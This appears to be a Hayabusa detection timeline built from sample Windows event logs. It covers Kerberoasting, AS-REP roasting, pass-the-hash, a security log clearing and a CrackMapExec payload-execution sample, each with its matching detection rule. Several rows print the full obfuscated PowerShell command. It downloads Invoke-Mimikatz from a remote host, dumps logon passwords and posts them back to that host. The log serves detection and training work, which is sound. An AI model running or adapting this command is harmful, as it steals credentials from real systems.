2021-04-29 16:56:26.869 +09:00,DC-Server-1.labcorp.local,4768,info,,Kerberos TGT Requested,User: Alice | Svc: krbtgt | IP Addr: ::ffff:192.168.1.2 | Status: 0x0 | PreAuthType: 0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
2021-04-29 16:56:26.980 +09:00,DC-Server-1.labcorp.local,4634,info,,Logoff,User: Bob | LID: 0xc66389,../hayabusa-rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
2021-04-29 16:58:02.652 +09:00,DC-Server-1.labcorp.local,4624,info,,Logon Type 3 - Network,User: DC-SERVER-1$ | Computer: | IP Addr: fe80::e50e:b89e:4718:3aa | LID: 0xc712f1,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
2021-04-29 16:58:02.666 +09:00,DC-Server-1.labcorp.local,4624,info,,Logon Type 3 - Network,User: DC-SERVER-1$ | Computer: | IP Addr: 192.168.1.100 | LID: 0xc7142b,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
2021-04-29 16:58:02.761 +09:00,DC-Server-1.labcorp.local,4624,info,,Logon Type 3 - Network,User: DC-SERVER-1$ | Computer: | IP Addr: fe80::e50e:b89e:4718:3aa | LID: 0xc714d9,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
2021-04-29 16:58:28.422 +09:00,DC-Server-1.labcorp.local,4769,info,,Kerberos Service Ticket Requested,User: DC-SERVER-1$@LABCORP.LOCAL | Svc: DC-SERVER-1$ | IP Addr: ::1 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
2021-04-29 16:58:28.425 +09:00,DC-Server-1.labcorp.local,4624,info,,Logon Type 3 - Network,User: DC-SERVER-1$ | Computer: | IP Addr: fe80::e50e:b89e:4718:3aa | LID: 0xc7313f,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
2021-04-29 16:59:42.537 +09:00,DC-Server-1.labcorp.local,4624,info,,Logon Type 3 - Network,User: DC-SERVER-1$ | Computer: | IP Addr: fe80::e50e:b89e:4718:3aa | LID: 0xc7adb8,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
2021-04-29 16:59:42.545 +09:00,DC-Server-1.labcorp.local,4624,info,,Logon Type 3 - Network,User: DC-SERVER-1$ | Computer: | IP Addr: fe80::e50e:b89e:4718:3aa | LID: 0xc7ae25,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
2021-04-29 18:23:54.244 +09:00,DC-Server-1.labcorp.local,1102,high,Evas,Security Log Cleared,User: Administrator,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx
2021-04-29 18:23:58.690 +09:00,DC-Server-1.labcorp.local,4776,info,,NTLM Logon To Local Account,User: Alice | Computer: | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx
2021-04-29 18:23:58.691 +09:00,DC-Server-1.labcorp.local,4624,info,,Logon Type 3 - Network,User: Alice | Computer: | IP Addr: 192.168.1.200 | LID: 0x27d676,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx
2021-04-29 18:23:58.691 +09:00,DC-Server-1.labcorp.local,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx
2021-04-29 18:23:58.718 +09:00,DC-Server-1.labcorp.local,4768,medium,CredAccess,Possible Kerberoasting,Possible Kerberoasting Risk Activity.,../hayabusa-rules/hayabusa/default/alerts/Security/4768_KerberosTGT-Request_Kerberoasting.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx
2021-04-29 18:23:58.718 +09:00,DC-Server-1.labcorp.local,4768,info,,Kerberos TGT Requested,User: Alice | Svc: krbtgt | IP Addr: ::ffff:192.168.1.200 | Status: 0x0 | PreAuthType: 
2,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx 2021-04-29 18:23:58.726 +09:00,DC-Server-1.labcorp.local,4769,info,,Kerberos Service Ticket Requested,User: Alice@LABCORP.LOCAL | Svc: sql101 | IP Addr: ::ffff:192.168.1.200 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx 2021-04-29 18:23:58.735 +09:00,DC-Server-1.labcorp.local,4634,info,,Logoff,User: Alice | LID: 0x27d676,../hayabusa-rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx 2021-05-01 05:27:39.761 +09:00,win10-02.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1059,technique_name=Command-Line Interface | Cmd: cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C "" 
-JOIN('91A78H101@116f46G83@101S114H118@105k99T101@80S111k105T110k116T77,97@110T97S103A101H114A93S58k58,83@101A114@118k101@114G67,101T114S116S105@102,105,99G97@116A101S86A97A108H105@100G97H116@105A111,110@67T97T108k108S98@97f99T107@32@61S32k123T36@116G114H117G101f125S10,116f114,121A123A10A91k82S101S102T93f46,65@115H115H101S109H98H108,121,46f71@101@116T84f121G112@101T40@39,83k121f115S39,43G39A116@101,109k46,77T97A110@39A43f39f97S103H101k109T101G110G116S46k65@117A116A39k43@39S111f109k97@116@105f111T110f46@65S109A39T43,39@115,105f85G116@39G43G39T105@108@115@39T41,46A71S101H116S70@105@101A108T100S40f39k97A109@39H43G39T115T105,73T110S105S39@43@39f116f70H97@105@108A101@100T39@44@32H39@78S111f110G80@39A43@39H117H98k108G105H99S44@83@116T97T39G43S39S116A105@99,39H41H46T83S101S116k86T97A108,117H101@40f36,110A117k108A108@44k32@36@116f114T117@101G41G10,125,99f97H116A99@104H123f125,10H91T78T101f116k46A83f101S114f118S105,99,101A80k111f105G110f116f77S97A110k97@103T101,114@93S58k58T83H101H114G118,101@114@67G101@114A116@105G102H105k99G97S116T101@86S97f108k105k100H97G116S105,111k110k67k97T108@108,98S97@99@107A32H61,32,123@36H116f114k117,101k125@10,91@83f121k115S116@101@109S46H78G101A116S46@83S101A114T118T105@99H101@80H111G105f110,116f77H97f110S97@103,101f114H93A58f58A83@101k99@117G114,105@116@121@80S114A111,116A111f99k111k108@32@61@32H91k83T121,115@116f101H109T46@78@101@116T46G83k101,99f117@114k105k116@121f80H114T111A116f111G99G111@108A84S121H112G101@93G39A83A115k108H51@44,84T108G115k44k84T108A115T49A49@44@84G108@115@49S50@39@10S73k69T88G32f40@78A101@119@45f79,98H106@101S99k116k32G78,101A116@46@87@101k98G67S108G105,101@110G116G41G46@68S111@119f110H108H111,97@100@83H116@114H105@110@103k40H39A104A116H116A112S115A58G47f47S49H48T46A50H51,46k49H50H51k46H49k49H58H52A52f51f47@73@110S118f111@107k101G45S77@105T109@105,107,97,116H122H46k112A115k49T39@41T10T36S99@109T100S32,61S32f73H110H118H111T107,101@45H77@105f109,105@107k97@116@122T32,45k67H111H109H109@97S110k100S32S39T112k114,105f118k105,108
G101T103A101,58H58A100A101S98S117,103S32@115@101H107@117@114A108k115,97f58,58f108S111H103S111A110,112H97f115H115G119@111G114@100f115@32S101f120f105k116G39,10G36G114H101f113k117,101S115G116@32@61,32A91A83T121T115k116k101G109G46H78H101S116@46H87k101T98G82S101S113@117A101@115k116H93@58S58@67T114,101T97H116S101@40k39T104f116k116k112k115S58,47f47@49G48@46,50k51G46@49G50,51H46@49@49A58H52H52,51@47@39k41A10H36S114H101A113,117@101@115k116@46,77,101H116@104G111k100S32@61A32S39S80G79k83k84k39T10H36@114k101,113T117H101H115@116,46,67H111T110@116S101@110G116T84@121S112,101k32G61H32T39H97,112G112,108T105f99k97f116k105f111@110T47@120G45,119H119S119S45T102S111,114H109A45f117G114f108f101H110H99H111k100f101k100T39@10,36A98@121G116f101@115f32T61T32G91H83A121S115G116,101,109T46k84G101f120T116S46T69A110G99T111k100,105S110k103@93@58T58S65T83S67S73G73G46A71A101G116f66k121f116@101H115T40,36,99T109@100S41k10@36A114H101f113@117H101H115H116G46G67A111,110@116,101f110,116T76A101H110f103f116@104@32,61S32S36@98T121H116G101,115f46A76@101f110A103f116H104A10@36G114G101G113A117f101H115k116k83,116f114G101T97k109A32S61T32f36H114@101,113f117@101f115S116H46f71f101G116,82S101T113f117,101,115S116,83,116T114H101k97f109T40S41,10T36S114H101G113H117S101f115H116H83@116A114G101G97H109G46f87k114k105H116G101T40A36f98f121@116H101k115T44@32S48S44k32,36,98k121G116@101@115T46G76@101H110,103G116A104,41H10k36T114G101G113A117@101@115@116T83k116A114k101T97H109A46H67S108S111A115A101k40T41T10H36k114S101@113f117T101@115S116S46f71@101f116,82f101f115@112T111k110@115S101k40@41'.sPlIT('@A@GkTfSH,' )|%%{([iNt] $_ -AS [char])})| .( $ENv:comsPec[4,26,25]-JOIn'')"" | Process: C:\Windows\System32\cmd.exe | User: OFFSEC\admmig | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x36df3b7 | PID: 7728 | PGUID: 9828DA72-683B-608C-A30C-000000000C00 | Hash: 
SHA1=F1EFB0FDDC156E4C61C5F78A54700E4E7984D55D,MD5=8A2122E8162DBEF04694B9C3E0B6CDEE,SHA256=B99D61D874728EDC0918CA0EB10EAB93D381E7367E377406E65963366C874450,IMPHASH=272245E2988E1E430500B852C4FB5E18",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx 2021-05-01 05:27:39.761 +09:00,win10-02.offsec.lan,1,high,Exec,Suspicious PowerShell Parent Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx 2021-05-01 05:27:39.761 +09:00,win10-02.offsec.lan,1,high,Exec | Evas,CrackMapExec PowerShell Obfuscation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_crackmapexec_powershell_obfuscation.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx 2021-05-01 05:27:39.761 +09:00,win10-02.offsec.lan,1,high,Exec,Wmiprvse Spawning Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx 2021-05-01 05:27:39.761 +09:00,win10-02.offsec.lan,1,medium,Exec,Change PowerShell Policies to an Unsecure Level,,../hayabusa-rules/sigma/process_creation/proc_creation_win_set_policies_to_unsecure_level.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx 2021-05-01 05:27:39.761 +09:00,win10-02.offsec.lan,1,medium,Exec,Too Long PowerShell 
Commandlines,,../hayabusa-rules/sigma/process_creation/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx 2021-05-01 05:27:39.911 +09:00,win10-02.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1086,technique_name=PowerShell | Cmd: powershell.exe -exec bypass -noni -nop -w 1 -C "" -JOIN('91A78H101@116f46G83@101S114H118@105k99T101@80S111k105T110k116T77,97@110T97S103A101H114A93S58k58,83@101A114@118k101@114G67,101T114S116S105@102,105,99G97@116A101S86A97A108H105@100G97H116@105A111,110@67T97T108k108S98@97f99T107@32@61S32k123T36@116G114H117G101f125S10,116f114,121A123A10A91k82S101S102T93f46,65@115H115H101S109H98H108,121,46f71@101@116T84f121G112@101T40@39,83k121f115S39,43G39A116@101,109k46,77T97A110@39A43f39f97S103H101k109T101G110G116S46k65@117A116A39k43@39S111f109k97@116@105f111T110f46@65S109A39T43,39@115,105f85G116@39G43G39T105@108@115@39T41,46A71S101H116S70@105@101A108T100S40f39k97A109@39H43G39T115T105,73T110S105S39@43@39f116f70H97@105@108A101@100T39@44@32H39@78S111f110G80@39A43@39H117H98k108G105H99S44@83@116T97T39G43S39S116A105@99,39H41H46T83S101S116k86T97A108,117H101@40f36,110A117k108A108@44k32@36@116f114T117@101G41G10,125,99f97H116A99@104H123f125,10H91T78T101f116k46A83f101S114f118S105,99,101A80k111f105G110f116f77S97A110k97@103T101,114@93S58k58T83H101H114G118,101@114@67G101@114A116@105G102H105k99G97S116T101@86S97f108k105k100H97G116S105,111k110k67k97T108@108,98S97@99@107A32H61,32,123@36H116f114k117,101k125@10,91@83f121k115S116@101@109S46H78G101A116S46@83S101A114T118T105@99H101@80H111G105f110,116f77H97f110S97@103,101f114H93A58f58A83@101k99@117G114,105@116@121@80S114A111,116A111f99k111k108@32@61@32H91k83T121,115@116f101H109T46@78@101@116T46G83k101,99f117@114k105k116@121f80H114T111A116f111G99G111@108A84S121H112G101@93G39A83A115k108H51@44,84T108G115k44k84T108A115T49A49@44@84G108@115@49S50@39@10S73k69T88G32f40@78A101@
119@45f79,98H106@101S99k116k32G78,101A116@46@87@101k98G67S108G105,101@110G116G41G46@68S111@119f110H108H111,97@100@83H116@114H105@110@103k40H39A104A116H116A112S115A58G47f47S49H48T46A50H51,46k49H50H51k46H49k49H58H52A52f51f47@73@110S118f111@107k101G45S77@105T109@105,107,97,116H122H46k112A115k49T39@41T10T36S99@109T100S32,61S32f73H110H118H111T107,101@45H77@105f109,105@107k97@116@122T32,45k67H111H109H109@97S110k100S32S39T112k114,105f118k105,108G101T103A101,58H58A100A101S98S117,103S32@115@101H107@117@114A108k115,97f58,58f108S111H103S111A110,112H97f115H115G119@111G114@100f115@32S101f120f105k116G39,10G36G114H101f113k117,101S115G116@32@61,32A91A83T121T115k116k101G109G46H78H101S116@46H87k101T98G82S101S113@117A101@115k116H93@58S58@67T114,101T97H116S101@40k39T104f116k116k112k115S58,47f47@49G48@46,50k51G46@49G50,51H46@49@49A58H52H52,51@47@39k41A10H36S114H101A113,117@101@115k116@46,77,101H116@104G111k100S32@61A32S39S80G79k83k84k39T10H36@114k101,113T117H101H115@116,46,67H111T110@116S101@110G116T84@121S112,101k32G61H32T39H97,112G112,108T105f99k97f116k105f111@110T47@120G45,119H119S119S45T102S111,114H109A45f117G114f108f101H110H99H111k100f101k100T39@10,36A98@121G116f101@115f32T61T32G91H83A121S115G116,101,109T46k84G101f120T116S46T69A110G99T111k100,105S110k103@93@58T58S65T83S67S73G73G46A71A101G116f66k121f116@101H115T40,36,99T109@100S41k10@36A114H101f113@117H101H115H116G46G67A111,110@116,101f110,116T76A101H110f103f116@104@32,61S32S36@98T121H116G101,115f46A76@101f110A103f116H104A10@36G114G101G113A117f101H115k116k83,116f114G101T97k109A32S61T32f36H114@101,113f117@101f115S116H46f71f101G116,82S101T113f117,101,115S116,83,116T114H101k97f109T40S41,10T36S114H101G113H117S101f115H116H83@116A114G101G97H109G46f87k114k105H116G101T40A36f98f121@116H101k115T44@32S48S44k32,36,98k121G116@101@115T46G76@101H110,103G116A104,41H10k36T114G101G113A117@101@115@116T83k116A114k101T97H109A46H67S108S111A115A101k40T41T10H36k114S101@113f117T101@115S116S46f71@101f116,82f101f115@112T111k110@115S101k40@41'.sPlIT('@A@GkTfSH
,' )|%%{([iNt] $_ -AS [char])})| .( $ENv:comsPec[4,26,25]-JOIn'')"" | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: OFFSEC\admmig | Parent Cmd: cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C "" -JOIN('91A78H101@116f46G83@101S114H118@105k99T101@80S111k105T110k116T77,97@110T97S103A101H114A93S58k58,83@101A114@118k101@114G67,101T114S116S105@102,105,99G97@116A101S86A97A108H105@100G97H116@105A111,110@67T97T108k108S98@97f99T107@32@61S32k123T36@116G114H117G101f125S10,116f114,121A123A10A91k82S101S102T93f46,65@115H115H101S109H98H108,121,46f71@101@116T84f121G112@101T40@39,83k121f115S39,43G39A116@101,109k46,77T97A110@39A43f39f97S103H101k109T101G110G116S46k65@117A116A39k43@39S111f109k97@116@105f111T110f46@65S109A39T43,39@115,105f85G116@39G43G39T105@108@115@39T41,46A71S101H116S70@105@101A108T100S40f39k97A109@39H43G39T115T105,73T110S105S39@43@39f116f70H97@105@108A101@100T39@44@32H39@78S111f110G80@39A43@39H117H98k108G105H99S44@83@116T97T39G43S39S116A105@99,39H41H46T83S101S116k86T97A108,117H101@40f36,110A117k108A108@44k32@36@116f114T117@101G41G10,125,99f97H116A99@104H123f125,10H91T78T101f116k46A83f101S114f118S105,99,101A80k111f105G110f116f77S97A110k97@103T101,114@93S58k58T83H101H114G118,101@114@67G101@114A116@105G102H105k99G97S116T101@86S97f108k105k100H97G116S105,111k110k67k97T108@108,98S97@99@107A32H61,32,123@36H116f114k117,101k125@10,91@83f121k115S116@101@109S46H78G101A116S46@83S101A114T118T105@99H101@80H111G105f110,116f77H97f110S97@103,101f114H93A58f58A83@101k99@117G114,105@116@121@80S114A111,116A111f99k111k108@32@61@32H91k83T121,115@116f101H109T46@78@101@116T46G83k101,99f117@114k105k116@121f80H114T111A116f111G99G111@108A84S121H112G101@93G39A83A115k108H51@44,84T108G115k44k84T108A115T49A49@44@84G108@115@49S50@39@10S73k69T88G32f40@78A101@119@45f79,98H106@101S99k116k32G78,101A116@46@87@101k98G67S108G105,101@110G116G41G46@68S111@119f110H108H111,97@100@83H116@114H105@110@103k40H39A104A116H116A112S115A58G47f47S49H48T46A50H51,46k49H50H51k46H49k
49H58H52A52f51f47@73@110S118f111@107k101G45S77@105T109@105,107,97,116H122H46k112A115k49T39@41T10T36S99@109T100S32,61S32f73H110H118H111T107,101@45H77@105f109,105@107k97@116@122T32,45k67H111H109H109@97S110k100S32S39T112k114,105f118k105,108G101T103A101,58H58A100A101S98S117,103S32@115@101H107@117@114A108k115,97f58,58f108S111H103S111A110,112H97f115H115G119@111G114@100f115@32S101f120f105k116G39,10G36G114H101f113k117,101S115G116@32@61,32A91A83T121T115k116k101G109G46H78H101S116@46H87k101T98G82S101S113@117A101@115k116H93@58S58@67T114,101T97H116S101@40k39T104f116k116k112k115S58,47f47@49G48@46,50k51G46@49G50,51H46@49@49A58H52H52,51@47@39k41A10H36S114H101A113,117@101@115k116@46,77,101H116@104G111k100S32@61A32S39S80G79k83k84k39T10H36@114k101,113T117H101H115@116,46,67H111T110@116S101@110G116T84@121S112,101k32G61H32T39H97,112G112,108T105f99k97f116k105f111@110T47@120G45,119H119S119S45T102S111,114H109A45f117G114f108f101H110H99H111k100f101k100T39@10,36A98@121G116f101@115f32T61T32G91H83A121S115G116,101,109T46k84G101f120T116S46T69A110G99T111k100,105S110k103@93@58T58S65T83S67S73G73G46A71A101G116f66k121f116@101H115T40,36,99T109@100S41k10@36A114H101f113@117H101H115H116G46G67A111,110@116,101f110,116T76A101H110f103f116@104@32,61S32S36@98T121H116G101,115f46A76@101f110A103f116H104A10@36G114G101G113A117f101H115k116k83,116f114G101T97k109A32S61T32f36H114@101,113f117@101f115S116H46f71f101G116,82S101T113f117,101,115S116,83,116T114H101k97f109T40S41,10T36S114H101G113H117S101f115H116H83@116A114G101G97H109G46f87k114k105H116G101T40A36f98f121@116H101k115T44@32S48S44k32,36,98k121G116@101@115T46G76@101H110,103G116A104,41H10k36T114G101G113A117@101@115@116T83k116A114k101T97H109A46H67S108S111A115A101k40T41T10H36k114S101@113f117T101@115S116S46f71@101f116,82f101f115@112T111k110@115S101k40@41'.sPlIT('@A@GkTfSH,' )|%{([iNt] $_ -AS [char])})| .( $ENv:comsPec[4,26,25]-JOIn'')"" | LID: 0x36df3b7 | PID: 4436 | PGUID: 9828DA72-683B-608C-A50C-000000000C00 | Hash: 
SHA1=F43D9BB316E30AE1A3494AC5B0624F6BEA1BF054,MD5=04029E121A0CFA5991749937DD22A1D9,SHA256=9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F,IMPHASH=7C955A0ABC747F57CCC4324480737EF7",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx 2021-05-01 05:27:39.911 +09:00,win10-02.offsec.lan,1,medium,Evas | Exec,Encoded PowerShell Command Line,,../hayabusa-rules/sigma/process_creation/proc_creation_win_powershell_cmdline_specific_comb_methods.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx 2021-05-01 05:27:39.911 +09:00,win10-02.offsec.lan,1,high,Exec | Evas,CrackMapExec PowerShell Obfuscation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_crackmapexec_powershell_obfuscation.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx 2021-05-01 05:27:39.911 +09:00,win10-02.offsec.lan,1,low,Exec,Non Interactive PowerShell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx 2021-05-01 05:27:39.911 +09:00,win10-02.offsec.lan,1,medium,Exec,Change PowerShell Policies to an Unsecure Level,,../hayabusa-rules/sigma/process_creation/proc_creation_win_set_policies_to_unsecure_level.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx 2021-05-01 05:27:39.911 +09:00,win10-02.offsec.lan,1,high,Exec,Suspicious PowerShell Parameter 
Substring,,../hayabusa-rules/sigma/process_creation/proc_creation_win_powershell_suspicious_parameter_variation.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx 2021-05-01 05:27:39.911 +09:00,win10-02.offsec.lan,1,medium,Evas,Suspicious XOR Encoded PowerShell Command Line,,../hayabusa-rules/sigma/process_creation/proc_creation_win_powershell_xor_commandline.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx 2021-05-01 05:27:39.911 +09:00,win10-02.offsec.lan,1,medium,Exec,Too Long PowerShell Commandlines,,../hayabusa-rules/sigma/process_creation/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx 2021-05-01 05:32:55.804 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,". 
( $PsHoME[4]+$PsHoME[34]+'X')( $(Sv 'Ofs' '' ) +[StriNG]('91A78}101d116,46t83d101A114d118A105A99A101W80N111N105N110N116d77}97A110z97}103z101A114N93,58A58N83d101}114}118t101t114}67A101t114A116N105W102}105,99A97t116}101,86}97}108W105W100z97}116,105}111}110W67,97N108A108}98}97}99A107,32A61t32N123t36}116,114A117}101A125N10A116A114A121}123}10}91}82W101W102A93A46d65}115,115}101d109t98,108t121t46}71z101N116N84t121z112d101d40t39z83N121d115z39}43z39t116N101A109d46}77d97d110N39A43z39W97d103W101W109t101}110N116W46d65A117z116z39W43d39}111d109A97z116}105A111z110z46W65A109}39z43A39}115t105}85t116}39N43z39d105A108A115t39z41N46W71W101}116z70d105N101A108t100,40}39,97}109d39A43W39z115}105}73d110}105}39d43t39A116t70t97N105N108}101d100A39z44z32N39W78A111A110z80W39z43d39,117t98N108}105t99}44N83,116W97}39}43A39}116W105,99W39}41z46A83N101,116z86d97}108t117N101z40A36N110d117A108A108z44N32}36}116}114,117A101N41W10,125,99}97A116A99,104d123t125A10}91t78t101}116,46,83d101W114z118}105N99A101d80A111,105t110}116W77,97N110d97,103A101}114W93}58t58}83A101d114z118t101A114A67N101W114d116,105N102d105N99}97,116W101z86t97}108}105A100A97,116z105A111z110}67W97d108d108}98}97z99,107N32N61,32,123}36d116t114}117}101N125}10N91A83}121,115A116}101z109A46}78}101W116N46A83}101,114,118,105}99N101,80,111A105z110A116A77A97,110N97t103t101t114}93}58d58t83N101t99,117d114z105A116d121,80}114,111}116,111}99A111W108W32}61A32W91W83z121W115}116t101}109d46}78A101t116N46t83N101A99}117d114W105d116A121}80d114W111t116z111}99d111z108}84z121N112z101,93A39,83A115z108,51d44W84}108z115A44N84A108t115A49W49N44,84}108}115N49d50,39W10t73t69t88W32}40A78A101A119A45A79d98d106t101z99}116A32W78}101W116t46}87,101N98A67,108A105d101}110d116,41A46z68d111N119N110z108A111}97A100z83t116A114A105A110,103,40A39d104d116N116N112A115t58A47N47z49}48z46,50}51A46}49d50t51N46}49A49A58N52}52}51W47}73W110A118}111A107}101N45t77}105A109}105,107W97t116z122z46,112t115}49A39,41d10t36d99t109z100t32W61d32t73}110,118,111}107d101W45W77z105}109}105,107d97z116d122W32d45t67z1
11A109W109}97d110t100t32A39,112A114}105N118W105}108N101}103z101N58,58t100d101t98z117t103W32W115W101}107t117d114z108A115}97,58N58W108A111A103A111}110A112A97A115N115z119d111}114d100A115N32N101,120}105}116z39}10,36A114}101z113d117N101}115t116N32d61t32A91}83d121A115W116W101d109t46N78t101A116A46}87z101W98z82t101W113d117A101t115d116d93d58N58W67,114}101d97A116}101z40}39N104N116}116t112,115W58t47d47N49A48d46}50A51A46}49,50N51N46}49A49,58t52d52}51}47}39}41A10z36N114}101z113z117N101A115W116A46d77t101W116W104A111t100,32,61z32,39d80,79,83W84d39z10}36t114A101t113d117W101t115N116z46d67}111A110t116z101z110}116t84d121}112A101}32A61t32A39z97d112W112W108}105,99N97d116t105}111z110z47}120}45A119t119z119}45N102,111N114}109A45d117A114t108z101N110A99A111}100}101A100z39A10t36z98}121,116A101z115A32A61}32}91N83}121A115W116N101d109A46}84}101W120N116}46N69,110}99W111W100}105t110,103A93,58A58z65z83W67d73t73W46A71N101}116t66}121,116A101}115A40,36N99A109A100A41z10A36A114z101A113}117,101N115A116W46,67d111d110z116z101t110A116}76}101z110t103}116A104,32}61t32N36d98,121N116z101}115N46}76z101N110,103z116W104}10A36d114d101A113N117}101A115d116}83z116A114A101,97N109z32,61}32}36}114W101t113N117,101W115A116}46A71}101W116A82z101A113A117N101t115N116t83A116A114}101d97d109}40}41t10z36A114t101d113A117}101A115A116A83N116}114d101}97W109A46,87z114d105,116A101,40}36W98N121z116z101t115}44A32z48}44d32}36A98W121t116A101}115W46,76N101t110W103}116,104t41d10A36z114N101}113A117}101}115d116}83A116N114t101W97W109W46,67}108}111}115d101t40t41A10z36W114}101t113t117N101A115N116t46d71t101W116}82W101z115}112}111A110d115}101}40,41'.SPlIT('Nz}tAdA,}W') | ForEach-ObJEct { ([int] $_ -AS [ChAR]) } ) +$( set-itEM 'VaRiAble:Ofs' ' ' ) )",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense 